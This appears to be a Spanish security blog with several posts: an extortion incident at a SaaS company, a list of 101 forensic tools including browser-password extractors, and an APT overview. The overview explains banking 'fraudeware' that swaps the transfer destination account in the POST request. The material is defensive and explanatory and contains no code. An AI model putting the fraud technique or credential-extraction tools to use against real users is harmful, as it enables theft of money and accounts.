ConexionInversa

Pávlov el zombie - Un caso de extorsión (I)

2012-01-07T12:16:00.000+01:00

Hola lectores,

Arturo y Eli son socios y jóvenes emprendedores dedicados en cuerpo y alma a un proyecto que idearon en la universidad hace cinco años. Se dedican en exclusiva a desarrollar aplicaciones en modo SaaS para empresas en el ámbito de medio ambiente y desde que comenzó el proyecto hoy cuentan con setenta empleados que no es poco en la crisis que vivimos.

El único problema digno de mención surgió hace dos años con un empleado que resaltaba por su brillantez a la hora de programar. Tenia un hueco y futuro en la empresa pero dado su carácter y forma de ser no acepto tener una mujer como responsable de equipo. Con el tiempo las relaciones entre los componentes fueron a peor y Arturo y Eli decidieron tras una gran discusión con este que debería de irse aún perdiendo un estupendo programador. La cosa se hizo de mutuo acuerdo y se despidió.

El tiempo pasa y la vida continua y esta magnífica empresa empieza a dar muy buenos resultados abriendo delegación en Brasil. Arturo y Eli mientras tanto son premiados por la Cámara de Comercio por su buena trayectoria. Deciros que hoy en día esta empresa tiene novios con objeto de ser comprada.

UN ZOMBI EN MI BUZON DE CORREO

El pasado mes de Noviembre Eli recibe un correo con una mala traducción al Español indicando que debe de pagar 90.000€ a una mafia ubicada en Rusia. En caso contrario "Pávlov el Zombie" que es como se hace llamar, le comunica que tras el plazo de siete días procederá a apagar los servidores de la empresa.

Por su puesto Eli, ve en el correo una broma y decide olvidar el asunto hasta que efectivamente al séptimo día y como bien dice ella "se forjo la maldición" y uno de los servidores de Active Directory se apago ordenadamente en plena ebullición de trabajo a las 12:00h.

En estos casos ya sabéis lo que ocurre. El responsable de sistemas empezó a recibir alertas, llamadas de sus compañeros y llamadas desde Brasil. Arturo que es alertado por el móvil no le da importancia y Eli la mínima (estas cosas pasan en todos los días en las empresas, pensó).

Pero la sorpresa fue mayúscula, cuando el administrador inicio sesión en el servidor y apareció el escritorio, se encontró con una fotografía de Eli con su familia de fondo de pantalla. Algo raro está pasando.

Esa misma mañana deciden reunirse y ver lo ocurrido Eli comenta que fue advertida por un tal "Pávlov" llegando a la conclusión de lo que pensó que era una mal broma la cosa empezaba a convertirse en cruda realidad. Paralelamente en la tarde del suceso Eli recibe más correos de 'Pávlov el Zombie' reclamando el dinero.

Para no hacer muy extenso el post os diré que hasta ahora esto es lo que ocurrió en la empresa y que esto ocurre en Septiembre y que por 'motu' propio de la empresa y tras hablar con sus abogados deciden realizar las siguientes acciones hasta primeros de noviembre:

Poner una denuncia. La operativa por parte de las fuerzas de seguridad y tras orden judicial se solicita a Google que de información de esa cuenta de correo. Esto además de ser un proceso arduo y duro viene a costar entres uno y tres meses dependiendo del tipo de maldad o fraude cometido.
Analizar las cabeceras de los correos recibidos (que por cierto son de Gmail)
Revisar el servidor y puestos de trabajo en busca de troyanos
Cambiar las contraseñas de todos los dispositivos, servidor y puestos de trabajo

Pero lo peor estaba por venir en Noviembre "Pávlov" alias "El zombie" reaparece y anunciaba que si no recibía el pago en cinco días antes de las 12:00h del Viernes, procedería a borrar información aleatoriamente del servidor.

Lo que antes fue una advertencia ahora se convertía en un reto dado que se supone que el control lo tiene la empresa.

ESTORNUDAR ES SIMBOLO DE INFECCION ZOMBIE

Bueno, pues lo dicho aquí es donde entramos a colaborar y allí estamos desde el Miércoles. El escenario que nos encontramos es el siguiente:

Cortafuegos Juniper en alta disponibilidad con balanceador de carga y dos servidores Windows 2008 con Active Directory, IIS publicando varias aplicaciones que se gestionan desde ayuntamientos y otras empresas por medio de una VPN. SQL Server 2008 como base de datos y replicadas en Barcelona en sendos servidores Windows Server 2008.

Una sospecha por parte de Eli y Arturo, del antiguo empleado que se marcho de la empresa de forma 'poco ejemplar'

y tres días solo para la hora 'H'

MIERCOLES

Con objeto de monitorizar se realizó (a la puta carrera) lo siguiente (no recuerdo muy bien el orden):

Se puso el Switch en modo 'port mirroring' en dos 'bocas'. En una de ellas se puso un detector de intrusos paralelamente con Wireshark a saco para capturar tráfico. En la otra se puso Spectrum de NetWitness

Se aplico una regla en los Juniper con un 'trigger' en log que vigilase todo el tráfico de entrada y salida de los dos servidores y del servidor de OpenVPN.

Se aplico una regla en los cortafuegos de Windows que comprobase todo el tráfico de salida con objeto de comparar con los Juniper

Se aplico la última actualización de los servidores (solo había una crítica del navegador)

Se desinstalo el antivirus actual y se instalo otro más agresivo y que fuera diferente a los de la red corporativa. Es posible que 'Pávlov' pudiera saltarse la detección del antivirus si había realizado un malware 'a medida' y mas si sospechamos del antiguo empleado.

Se hizo pasar la navegación de los servidores por un proxy con autenticación. De esta forma si el atacante utiliza un malware de upsss 'conexión inversa' con algún puerto no estándar quedaría registrado en el proxy y no tendría efecto.

Se deshabilito el servicio de terminal server (empleado solo por los administradores) y se instalo Wireshark en los servidores (si , ya se que fue un poco bruto). Esto se debe a que si el malware utiliza algún tipo de cifrado, nos sería mas sencillo de ver en la capa de red y usuario que es lo que envía y recibe. Por ultimo instalamos varias utilidades para monitorizar los procesos (decidimos no utilizar los propios del sistema operativo por si este estuviera comprometido) entre ellos Restarter y LogLady. También instalamos un syslog para que nos mandara los eventos de Windows a un pc de la instalación.

Con el monitor de actividad de SQL Server se comprobó el uso y funcionamiento.

Un compañero se dedico 'a saco' a revisar posibles vulnerabilidades en los aplicativos web

Tras diversas discusiones y aun sabiendo que no resultaría muy efectivo se virtualizo en VMware los servidores y sin seguir las recomendaciones de Microsoft (ver) (cosas del modo paranoico)

Y así pasamos un bonito Miércoles...

JUEVES

Vuelta a revisar todo de arriba abajo y de abajo arriba, reuniones y modo paranoico en 'ON'.

VIERNES 8:10h

Me llama Arturo y Eli casi simultáneamente indicando que han vuelto ha recibir un email avisando de que se va a proceder al borrado de datos a la hora indicada. Se informa y adjunta el email a la denuncia que se realizó a las fuerzas de seguridad. Vuelta a re-e-e-e actualizar el antivirus y revisar las actualizaciones de Windows

10:00h

Vuelta a revisar todo. Se estudia la posibilidad de avisar a los clientes, se diseña un protocolo y correo que nunca se llega a enviar. Volvemos a cambiar las contraseñas. La locura se hace evidente. La dirección de la empresa piensa en apagar los sistemas para que no se produzca el borrado. Es decir hacer un 'haraquiri' o auto-denegación de servicio. Cosa por mi parte inadmisible dado que mueves el problema a otra fecha y no lo resuelves, además de perder datos de investigación muy relevantes. Vuelta hacer Backups por si acaso.

11:00h

Todo el mundo atento. Todo el mundo firmes y en posición de batalla, sensores, Log's y nuestra atención al filtrado de los cortafuegos, proxy's e IDS's

11:28h

Silencio total. Todos mirando el monitor. El 'acojone' y los apretones de tripa 'se huelen'

12:00h

Silencio. Todo funciona con normalidad. No se oye nada de vez en cuando un teléfono. La tecla F5 (actualizar) va 'a toda hostia'

12:05h

Revisión de log's, revisión de controles y vuelta a monitorizar

12:30h

Caras de alegría. El tipo no puede entrar. No tiene control. Todo va normal

13:00h

Alegría tensa. Primera reunión después de DEFCON 1. Pensamos que todo ha sido una 'mala pasada' y que si antes tenia el control ahora es evidente que no lo tiene. Pasamos a DEFCON 2. (Perdón por la jerga militar). Esperamos hasta la hora de comer ya hacemos hasta bromas pero no dejamos de mirar las pantallas

14:30h.

Eli y Arturo nos hacen pedir para todos unas Pizzas y coca colas. Hoy todos comemos en la sala de reuniones. La invitación a una comilona se hace palpable, pero hoy no y como dijo José Mota: mañaaaaaaaana. (NOTA: La comida se produjo pero no tan pronto como nos hubiera gustado)

16:00h.

Todos nos relajamos, el Tsunami no llego a serlo. Mas y mas bromas, somos los mejores

16:22h

LOS ZOMBIES NO DISCRIMINAN, TE COMEN SI VAS LENTO

El administrador de dominio en una copia de datos rutinaria le da error la carpeta de origen. Comprueba alertado que los datos no están. Han desaparecido delante de nuestra cara y estupefacto me quedo al comprobarlo.

También faltan las carpetas de "Archivos de Programa" aunque algunos ficheros no se han borrado debido a que están en uso. Entre los desaparecidos están los ficheros raíz y muchos archivos de la carpeta Windows. Aquí el único que se ha enterado es el visor de eventos de Windows que nos ha enviado el evento a una máquina remota.

FAIL!!!

¿Pero que cojones ha ocurrido?, ¿Como es posible?.

Ninguna alerta, ninguna alarma, el IDS's ni se entera. Los logs's de lo Juniper a cero bytes, ningún proceso ha sido creado, nadie ha tocado nada, las conexiones de red las normales con acceso y peticiones http y https. Ningún tráfico de salida desde los dos servidores y aún así este tipo ha conseguido acceso y borrado datos tal y como predijo.

Las preguntas vuelan y la perplejidad de Eli y Arturo que con la mirada lo dicen todo, hacen ver que la derrota es muy amarga. Aunque los datos se han podido recuperar y realmente ha sido lo de menos, lo que verdaderamente mas me ha dolido en mi orgullo es que he perdido la apuesta (moral) con esta empresa con un 0-2 para 'Pávlov'. La verdad es que me senti derrotado.

Las dudas y mareos

¿Me estaré enfrentando realmente a un hacker contratado por la mafia?, ¿Se me ha pasado por alto algún control?, ¿dispone 'Pávlov el zombie' de algún 0Day? o he subestimado el potencial de un ex-empleado...

Es momento de volcar la memoria de los servidores, analizar lo poco que tenemos,volver a recapacitar y revisar con mas profundidad los controles. Cuando se toca fondo solo hay un camino y es tirar hacia arriba.

************

Bueno el resultado técnico final y con pantallas lo tendréis para la semana que viene... no os lo perdáis por que la cosa va por SQL SERVER y no es un ataque web, ni de SQL-Injection ni por asomo un 0day, ni malware que se le parezca. También es la historia de un empeño por descubrir que ha pasado

¿Que será?...

En este mundo de Zombies veremos quien caza a quien...

101 utilidades forenses

2011-11-15T17:58:00.001+01:00

Hola lectores,

Estuve revisando el software y hardware que suelo llevarme cuando tengo un caso o intervención en un cliente y he creído conveniente compartir las utilidades que mas suelo emplear o que alguna vez he necesitado. También de paso contesto a los correos en los que me preguntáis por una u otra herramienta.

Quiero decir que este recopilatorio es personal y se basa en aquellas utilidades que suelo emplear o como ya he dicho he precisado alguna vez. Algunas son comerciales y en su mayoría 'Open'. He puesto 101, pero seguro que me dejo alguna.

Estan ordenadas alfabeticamente pero no las he categorizado dado que muchas hacen lo mismo y valen tanto para analizar ordenadores como dispositivos móviles, buscar malware o encontrar evidencias.

Espero que os sean de utilidad.

101 UTILIDADES


Advanced Prefetch Analyser	Hallan Hay	Lee los ficheros prefetch de Windows. Simplemente genial

Agent Ransack	Mythicsoft	Busca multiples ficheros usando Perl Regex. Lo he utilizado alguna vez con resultados muy efectivos.

analyzeMFT	David Kovar	Permite realizar 'Parses' de MFT en sistemas NTFS con objeto de analizarlos con otras herramientas. Lo he utilizado en combinación con EnCase.

Audit Viewer	Mandiant	Visualizador utilizado en combinación con Memoryze.

Autopsy	Brian Carrier	Reconocida herramienta gráfica para entornos Linux con muy buen sabor y experiencia en entornos forense. Es otro clásico a utilizar.
Backtrack	Backtrack	Suite de 'Penetration testing' y seguridad para la realización de auditorias de seguridad. Muy muy bueno.
Bitpim	Bitpim	Analiza dispositivos móviles como LG, Sanyo, etc.
Caine	University of Modena e Reggio Emilia	Live CD, con numerosas utilidades y herramientas.
		Analiza tarjetas SIM, direcciones, llamadas, etc.
ChromeAnalysis	forensic-software	Herramienta que permite el análisis del historico de internet del famoso Google Chrome
ChromeCacheView	Nirsoft	Lee los ficheros de la cache de Google Chrome y visualiza en una lista lo que se encuentra almacenado.
DCode	Digital Detective	Convierte varios tipos de fechas y tiempos. Me ha venido bien para los distintos formatos en Unix.
Defraser	Varios	Detecta ficheros multimedia en espacios 'unallocated'.
Digital Forensics Framework	ArxSys	Framework que permite el análisis de volumenes, sistemas de ficheros, aplicaciones de usuario, extracción de metadatos, ficheros borrados y ocultos.
DumpIt	MoonSols	Realiza un volcado de la memoria a fichero. Funciona en 32 y 64 y se puede ejecutar desde un USB
EDB Viewer	Lepide Software	Visualiza (pero no exporta) ficheros Outlook sin utilizar Exchange Server.
EnCase	Guidance	Potente herramienta y la mejor de su especie. De reconocido prestigio internacional. Vale para todo en el ámbito forense. Económicamente muy elevada pero muy recomendable. La suelo utilizar
Encrypted Disk Detector	JAD software	Comprueba discos físicos en busca de ficheros o volumenes cifrados con TrueCrypt, PGP, o Bitlocker.
Exif Reader	Ryuuji Yoshimoto	Extrae datos(metadatos) Exif de fotografias digitales.
FastCopy	Shirouzu Hiroaki	Uno de los mas rapidos en copiar y/o borrar, permite utilizar SHA-1. Lo he utilizado para copia masiva de datos con muy buenos resultados
FAT32 Format	Ridgecrop	Habilita la capacidad de almacenamiento de discos formateados en FAT32
Foca	Informatica64	Herramienta para fingerprinting e information gathering en trabajos de auditoría web. Lo utilizo para casi todo, especialmente el tema de metadatos
Forensic Image Viewer	Sanderson Forensics	Visor de varios formatos con posibilidad de extraer metadatos Exif o datos de geolocalización GPS. Lo suelo emplear bastante.
ForensicUserInfo	Woanware	Extrae información relacionada con los usuarios en Windows utilizando los ficheros SAM, SOFTWARE y SYSTEM hives también desencripta hashes LM/NT.
FoxAnalysis	forensic-software	Herramienta que permite el análisis del historico de internet de firefox.
FTK Imager	AccessData	Herramienta para adquirir, montar y analizar de forma básica imágenes de equipos. También es capaz de volcar la memoria a fichero. Muy completa
Gmail Parser	Woanware	Obtiene de ficheros HTML información que se ha 'cacheado' al utilizar 'artefactos' de Gmail
HashMyFiles	Nirsoft	Calcula hashes MD5 y SHA.
Highlighter	Mandiant	Examina ficheros log usando texto, gráficos o histogramas.
IECacheView	Nirsoft	Lee los ficheros de la cache de Internet Explorer y lo visualiza en una lista.
IECookiesView	Nirsoft	Extrae detalles de las cookies de Internet Explorer.
IEHistoryView	Nirsoft	Extrae las visitas recientes de las URL's de Internet Explorer.
IEPassView	Nirsoft	Extrae las passwords de Internet Explorer en las versiones 4 a 8.
KaZAlyser	Sanderson Forensics	Extrae información del famoso programa P2P KAZA.
Live View	CERT	Permite al analista examinar y 'arrancar' imagenes en formato dd y VMware. También muy útil
LiveContactsView	Nirsoft	Visor que permite exportar los contactos y otros detalles de Windows Live Messenger.
Mail Viewer	MiTeC	Maravilloso visor de Outlook Express, Windows Mail, Windows Live Mail, Mozilla Thunderbird y ficheros basados en ficheros EML.
Memoryze	Mandiant	Adquiere y analiza imagenes RAM. Lo bueno es que permite analizar el fichero pagefile en sistemas vivos. Es algo engorroso, pero me encanta.
MFTview	Sanderson Forensics	Muestra y decodifica contenidos extraídos en ficheros MTF.

MobaLiveCD	Mobatek	Ejecuta un ISO linux desde windows sin tener que reiniciar. Basado en QEMU. Me ha venido bien en alguna ocasión para utilizar servidores FTP sin tener que tocar windows.
MobilEdit	MobilEdit	Recoge todos los datos posibles desde el teléfono móvil, a continuación, genera un amplio informe que se puede almacenar o imprimir. Soporta la mayoría de los móviles.
Motorola Tools		"Flash & Backup" - actualiza el firmware y "M-Explorer" - administrador de archivos pequeños, fáciles de usar y gratis
MozillaCacheView	Nirsoft	Lee los ficheros de la cache de Mozilla y visualiza en una lista lo que se encuentra almacenado.
MozillaCookieView	Nirsoft	Extrae detalles de las cookies de Mozilla.
MozillaHistoryView	Nirsoft	Herramienta que permite el análisis del historico de internet de Mozilla.
MyLastSearch	Nirsoft	Extrae búsquedas utilizadas en los buscadores mas populares (Google, Yahoo y MSN) también en redes sociales (Twitter, Facebook, MySpace)
Netdetector	Niksun	Analizador de red y detector de intrusiones
Netwitness Investigator	Netwitness	Analizador de paquetes de red. Increíblemente bueno.
NetworkMiner	Netresec	Programa de captura con el fin de detectar los sistemas operativos, las sesiones, los nombres de host, Puertos abiertos, etc.
Notepad ++	Notepad ++	Ya jamas volveré al notepad clásico después de utilizar este Notepad.
OperaCacheView	Nirsoft	Lee los ficheros de la cache de Opera y visualiza en una lista lo que se encuentra almacenado.
OperaPassView	Nirsoft	Desencripta las password del fichero 'wand.dat' de Opera.
Oxygen	Oxygen	Maravillosa herramienta comercial analiza todos los datos disponibles de un móvil. No puedo vivir si ella.
P2 eXplorer	Paraben	Realiza montajes virtuales de unidades y de imágenes. Casi toda la suite, por no decir toda es muy interesante y útil.
P2 Shuttle Free	Paraben	Suite maravillosa que permite montar remotamente discos, captura de tráfico de red, de RAM, utilidades de búsqueda etc.
Paraben Forensics	Paraben	Al igual que las anteriores, recoge todos los datos posibles desde el teléfono móvil, a continuación, genera un amplio informe que se puede almacenar o imprimir.
PasswordFox	Nirsoft	Extrae usuario y contraseñas almacenadas en Mozilla Firefox.
Process Monitor	Microsoft	Examina los procesos windows y permite hacer un seguimiento en tiempo real del registro y accesos a disco. Excelente y genial herramienta
PST Viewer	Lepide Software	Abre y visualiza (tampoco exporta) ficheros PST sin necesidad de Outlook.
PsTools	Microsoft	Maravillosa Suite de utilidades en modo comando. Siempre lo llevo encima.
recuva	Piriform	Has querido recuperar tus ficheros en Windows? Entonces esta es tu utilidad
Registry Decoder	Digital Forensics Solutions	Para la adquisición, análisis e informe del contenido del registro.
RegRipper	Harlan Carvey	Herramienta de correlación y extracción de evidencias forenses del registro. Todo un lujo del maestro de los maestros forenses. La utilizo día si y día también.
Regshot	Regshot	Realiza snapshots del registro con objeto de comparar y ver los cambios que se producen. Ideal para ver que hace un malware.
rstudio		Es una suite de software de recuperación de datos que puede recuperar archivos de FAT (12-32), NTFS, NTFS 5, + HFS / HFS, FFS, UFS/UFS2 (* BSD, Solaris), ext2/ext3 (Linux
Shadow Explorer	Shadow Explorer	Visualiza y extrae ficheros de copias shadow. Lo utilizo en busca de malware. Muy bueno.
SIFT	SANS	VMware Appliance de SANS configurado con multiples herramientas para el análisis forense. Otra tool para llevar encima.
SkypeLogView	Nirsoft	Analizador del famoso Skype
Snort	Snort	El mas versatil y magnifico detector de intrusos. Me ha salvado muchas veces del apocalipsis
SQLite Manager	Mrinal Kant, Tarakant Tripathy	add-on en Firefox que permite ver contenidos de bases de datos SQLite. Otra de las joyas de la corona.
Strings	Microsoft	No puedo vivir sin el. Busca contenido de texto en ficheros.
Structred Storage Viewer	MiTec	Visualiza y maneja estructuras basadas en ficheros MS OLE. Lo sigo utilizando.
Suite Getdata	getdata	Magnifica suite de herramientas forenses para el montaje de discos virtuales, imágenes y recuperación y analisis de datos. Excelente conjunto de herramientas
Triana Tools	Informatica64	Herramienta indispensable para el análisis forense de IPHONE del magnifico Juanito. Si la quieres te la proporcionan si vas a los cursos
Ubuntu guide	How-To Geek	Guia para usar con Unbuntu live con objeto de utilizar recuperación de particiones, ficheros, etc. Tengo mala memoria y suelo acudir alguna vez.
UFED	Cellebrite	Es el sistema más completo que combina la extracción lógica y física, la recuperación de clave de acceso y extracción del sistema de archivos de multiples dispositivos móviles. Es caro pero de lo mejor
Unhide	Security By default	Me encanta, muy útil en tiempos desesperados, mas si se trata de entornos Linux. Si quieres detectar procesos 'raros' este es tu software
USB Device Forensics	Woanware	Detalles de las unidades USB que se han conectado a un equipo.
USB Write Blocker	DSi	Habilita la posibilidad de escribir o bloquear puertos USB.
USBDeview	Nirsoft	Igual que la anterior.
UserAssist	Didier Stevens	Muestra una lista de programas que se han ejecutado incluyendo ultima ejecución , número de veces y fechas y horas. Muy bueno.
VHD Tool	Microsoft	Convierte discos e imágenes al formato VHD que se puede montar en Windows desde el administrador de discos. Me ha sacado de algún apuro
VideoTriage	QCC	Produce miniaturas de ficheros de video con objeto de apreciar imágenes o movimientos perdidos en la película. Excelente utilidad para mostrar evidencias.

Volatility Framework	Volatile Systems	Framework que se compone de una colección de herramientas para la extracción de ficheros RAM. Maravillosa herramienta para la detección de Malware. La tengo configurada en SIFT de SANS.
Web Historian	Mandiant	Magnifica herramienta que reúne las anteriores y permite de los navegadores mas utilizados obtener el historico de navegación.
Windows File Analyzer	MiTeC	Otra maravillosa suite para analizar ficheros thumbs.db, Prefetch, INFO2 y .lnk. Como os podeis imaginar lo empleo muchísimo.
Windows Forensic Environment	Troy Larson	Guia de Brett Shavers para crear y trabajar con un CD que arranque un Windows (Similar a windows PE).
Wireshark	Wireshark	Algo que decir de esta maravillosa herramienta?. Excepcional!!
Xplico	xplico	Entorno gráfico para poder entender y visualizar el contenido de ficheros PCAP. Muy útil!!


	OSforensics	Osforensics	Una forma rapida de investigar el contenido de ficheros borrados, último acceso. Muy útil si tienes prisa y el equipo no es necesario aportarlo para una evidencia.


	Responder	HBgary	Convierte la memoria RAM a disco y reconstruye todas las estructuras de datos subyacentes de hasta 6 gigabytes de RAM.


	Liveview	Liveview	Es una herramienta basada en Java que crea una máquina virtual de VMware de una imagen de disco sin procesar (dd-style) o un disco físico. Muy buena!!

De cabañas y otras cositas...

2011-10-19T22:35:00.002+02:00

Hola lectores,

Este fin de semana nos vamos para el Escorial para realizar el <aseguraITCamp3>, ya que por segundo año (consecutivo para mi) y gracias a Chema Alonso (si, un tipo que le gusta la ecología y no hace mas que hablar y hablar de las FOCAs) me ha permitido impartir una conferencia (de la mano de Bitdefender) sobre Advanced persistent threat (APT). Una novedosa e insidiosa forma de atacar empresas sin que te des cuenta de que te han robado lo más intimo de tu compañía. Muchos ya lo habreís leido en el blog, pero aquí lo ampliaré con otros casos que han ocurrido en España.

Voy a ir acompañado de 'Horatiu Bandiou' de Bitdefender. Un tipo rudo, con pinta de mafioso y especialista en armamento y en desarmarte en menos que respiras. Además es un crack en seguridad informática y que ha trabajado para lo mejorcito y peorcito de los gobiernos de Europa, también y sin que esto no signifique nada es Rumano ;-)

Ya sabes o vienes a esta conferencia o te parte las piernas...

Nos vemos amigos...!!

El fraude-ware te vigila. Otro de APT

2011-09-29T22:03:00.000+02:00

Hola lectores,

Parece ser que el último post sobre ataques persistentes ha tenido bastante movimiento y muchos de vosotros me habéis solicitado en muchos correos mas detalles sobre este nuevo tipo de ataque. Como todavía no puedo facilitaros mas información voy a dar una visión mas general de como es el mapa de este tipo de ataques.

Durante muchos años, los piratas informáticos operan desde China (sean o no responsables) y han estado atacando a un gran número de sistemas comerciales y gubernamentales aquí en España y en el extranjero.

En la última conferencia de la NcN en Barcelona, hablé veladamente de ello y quisiera destacar una entrevista en el periódico el País que le hizo a Luis Jiménez, responsable de la seguridad electrónica del servicio de inteligencia del CNI y en la que cito literalmente lo que dijo: "España fue blanco de más de 40 ataques "graves", varias instituciones clave fueron tocadas. Cuatro de los 40 ataques alcanzaron al CNI: dos de ellos, al Centro Criptológico Nacional."

Extracto de la entrevista

Otra de las perlas es este gazapo de la televisión estatal China que en una emisión en directo del canal 7 (CCTV 7) en el Instituto Militar del PCCh (partido comunista) muestran en una pantalla los ataques dirigidos a través de Internet a sitios Web.

En la pantalla se puede mal apreciar una dirección IP: 138.26.72.17

Que buscando por geo-localizacion nos encontramos esto:

¿Que estarán haciendo los Chinos en Alabama?

Vamos mas claro y en botella 'agua'.

MAPA DE ACTORES

Viendo los diferentes casos en los que he colaborado mas o menos podría decir que existen varios escenarios:

Mafias - Advanced Persistent Threats
Espionaje Industrial - Advanced Persistent Threats
Ciberguerra - Advanced Persistent Threats

De ahora en adelante APT, vamos a empezar con la primera:

MAFIAS - APT

Su objetivo es obtener beneficios económicos de forma rápida atacando y/o troyanizando al usuario de una entidad financiera. Como si de una empresa se tratase, consiguen realizar toda una cadena de desarrollo, producción , venta y explotación.

En la imagen anterior aparecen los siguientes actores:

Desarrollador de exploits: Es la persona(as) que disponen de la técnica suficiente para la elaboración del malware, no tiene que ser una persona y muchas veces se compone de un equipo que va de tres a cinco programadores. Su precio oscila entre los 10.000€ y 20.000€ dependiendo si desarrolla un 0 Day o consigue un malware indetectable en el tiempo. También se cobra más si es remoto y todavía más caro si afecta a los navegadores de los usuarios.

Vendedor de exploits & packs: Al igual que el desarrollador de exploits puede ser desde una persona a un equipo. En los casos que he visto pueden ser los mismos integrantes del equipo que desarrolla una forma 'paquetizada' de su producto. También son los que dan 'soporte' a la venta y/o actualizaciones. Pueden ganar entre 1.000€ y 3.000€ dependiendo de su integración y conocimiento del producto con los desarrolladores.

Vendedor de Bots: Vendría a ser la figura del 'account manager' de cualquier empresa normal, controlan el canal de venta y aunque parezca mentira, su producto estrella no es la venta de 'bots', es la venta de identidad digital, obviamente robada anteriormente. Con esta identidad falsifican tarjetas de crédito y compran dominios que a su vez hospedan y venden. Su figura en todo este proceso es ser transparente, por no decir invisible. Es muy difícil involucrarlo ante la justicia por falta de evidencias. También se dedican a la venta de pornografía infantil.

Es el actor que más dinero gana de la cadena dada su versatilidad en 'otros productos'.

Botmaster y Recolector de cuentas: Son los compradores finales, que pueden ser las mismas mafias que han 'contratado' el desarrollo del 'producto' o bien entidades menores como grupos organizados o pequeñas mafias. El recolector de cuentas puede ser una persona o grupo que dispone de una gran base de datos de cuentas de correo, preferiblemente de entidades financieras. Su posición es arriesgada dado que son la cabeza visible del ataque o de la gestión del panel de control.

Muleros: Como ya sabréis son los encargados de obtener el dinero fisicamente desde su propia cuenta corriente quedando un margen disponible del montante para el. Suelen ser los primeros que las fuerzas de seguridad atrapan dada su exposición fisicamente a la hora de personarse en la entidad financiera.

Víctimas: 'Sin comentarios'.

ESPIONAJE INDUSTRIAL - APT

Muy de moda hoy en día sobre todo en epoca de crisis. Muchas empresas no tienen lo suficiente para invertir en I+D y sale mas rentable 'fotocopiarselo' a la competencia.

Su objetivo es disponer de más información que la competencia y aquí entramos en la guerra de guerrillas, vale todo desde información financiera, documentos confidenciales y planos hasta información privada y si es comprometedora mucho mejor. Esto les da ventaja en la carrera.

Los actores apenas han cambiado, tan solo desaparece el vendedor de bots dado que su relación es ahora mucho mas directa y confidencial entre los que piden 'hazme un troyano para la empresa x' y los que lo desarrollan. Los precios aumentan dado que su exposición es mas directa y facil de poder llegar a descubrir (dependiendo de como es la empresa).

Tan solo destacar o diferenciar que la información obtenida no tiene valor en el mercado solo beneficia a la empresa que lo contrata. Los actores y el canal de distribución es idéntico que en la primera imagen.

CIBERGUERRA - APT

LLeva años durmiendo veladamente, aunque la realidad es que ha despertado con fuerza. Aquí los amos o por lo menos los mas señalados como ciber-agresores es China.

El anonimato difumina al enemigo y la complejidad de las redes hace imposible controlar el alcance de una acción ofensiva.

Se ha visto en los ataques contra Estonia, contra Georgia y en julio de 2009, contra Corea del Sur y Estados Unidos: los ataques no venían de un solo sitio sino de decenas, incluidos los países víctimas. Eran ordenadores personales secuestrados mediante malware que esconden la verdadera identidad del enemigo.

El objetivo de estos hackers de los distintos países no es otro que disponer de información y tener control de actividades, información diplomática y si llega el caso el poder de activar o desactivar ciertas defensas de los países atacados.

Aquí los actores al igual que las anteriores imágenes varían poco, salvo que son 'financiados' por los ejércitos especializados. En este caso la cadena de distribución llega hasta el botmaster.

También otro nuevo escenario entra a formar parte de la vida cotidiana. El grupo Anonymous empieza a atacar tanto a gobiernos, instituciones y empresas privadas con objeto de reivindicar un cambio en la sociedad.

Por lo tanto el mapa queda de la siguiente forma:

Como vemos hay muchos componentes y quízas me olvide alguno, pero podemos decir que están casi todos, muchos de ellos son los que están dejando en ridículo a fuerzas de seguridad, empresas y hasta los mismos Gobiernos. La batalla no ha hecho más que comenzar.

Siguiendo con el anterior post sobre APT he querido mostrar un curioso ataque que duró cierto tiempo y que nos tuvo un mes bastante ocupaditos.

MAFIA - Advanced Persistent Threats - ·Vigila que te vigilan"

Bueno, dado este punto vamos a ver un caso real de un ataque APT sobre una entidad financiera. Este caso lo suelo exponer con un vídeo cuando estoy dando alguna conferencia. En el post voy a poner solo pantallas dado que el vídeo carece de explicación y por lo tanto es más difícil entenderlo. También decir que este ataque ya no tiene efecto dado que se han tomado las medidas oportunas y por otro lado los números de cuenta de las pantallas ya no existen.

Este caso es lo que se denomina un ataque a medida y realizado en exclusiva para una determinada entidad financiera, es decir los atacantes se han tomado la molestia de ir a una oficina bancaria y abrir una cuenta para ver el funcionamiento de la banca electrónica. Para ello habrán analizado las entradas y salidas, la gestión de errores, vulnerabilidad si las hubiera, etc. etc.

Una vez observado el funcionamiento el equipo APT se pone a desarrollar el malware.

OBJETIVO: Conseguir dinero de una forma fácil.

MODUS OPERANDI: Cuando se realiza una trasferencia económica de una cuenta a otra, el malware cambia la cuenta de destino por un 'pool' de número de cuentas maliciosas o de muleros ubicados en otros países. ¡¡Ahí es ná!!

DISTRIBUCION: Utilizan el método clásico del Phising

TIPO DE MALWARE: En concreto este 'bicho' (realmente no es un malware sería mejor llamarlo 'fraudeware') no es detectado por ningún antivirus por una cosa que es obvia, realmente las acciones del 'bicho' no crean procesos ocultos, ni ficheros, ni almacena contraseñas, tan solo modifica el post de envio, por lo tanto es innocuo, incoloro e inodoro para los antivirus. (simplemente perfecto).

EMPEZAMOS!!

Vamos a ver su funcionamiento una vez ejecutado el 'fraudeware' desde el punto de vista de aplicación y simulando ser la victima.

Inciamos sesión en la banca electrónica en cuestión, obteniendo la siguiente pantalla con la posición global, es decir nuestras cuentas y tarjetas de crédito.

Posición Global

Una vez en este punto, nos proponemos realizar una transferencia a una cuenta conocida. Es decir pasamos 1.000€ de la cuenta total a la cuenta limitada.

Pantalla de transferencia

En este paso, lanzamos Tamper Data, para capturar y poder ver si se modifican los parámetros del post. Aquí se ha realizado con esta utilidad para su comprensión y entendimiento, pero la realidad es que estuvimos varios días monitorizando, procesos, comunicaciones y análizando tráfico "por un tubo".

Pantalla del Tamper Data

Una vez lanzado, Tamper Data nos muestra en el mismo momento de pulsar el botón 'confirmar' los campos que van a ser enviados y entre ellos el campo 'cuentaDestino' que contiene un número de cuenta que nada tiene que ver con el puesto en la cuenta de abono . Es decir el número de cuenta de abono '*52 07006*', es sustituido por un número de cuenta con destino en Rumanía.

En este paso y como en casi todas las bancas electrónicas se nos pide la operación de firma, es decir o bien una posición de la tarjeta de coordenadas, un token o una clave de un sólo uso que se puede enviar al móvil.

El usuario confiado y dado que ve en pantalla (que no en el post de envío) un número de cuenta corriente conocido procede a utilizarlo y pulsar la confirmación. Es aquí donde desaparecen 1.000€

Como decia anteriormente, está técnica ya no es funcional para los piratas dado que la entidad puso medidas correctoras, pero eso ya será en otro post, que hoy vengo de viaje y estoy algo cansado.

Y otra NcN que finaliza...

2011-09-19T18:02:00.001+02:00

Hola lectores,

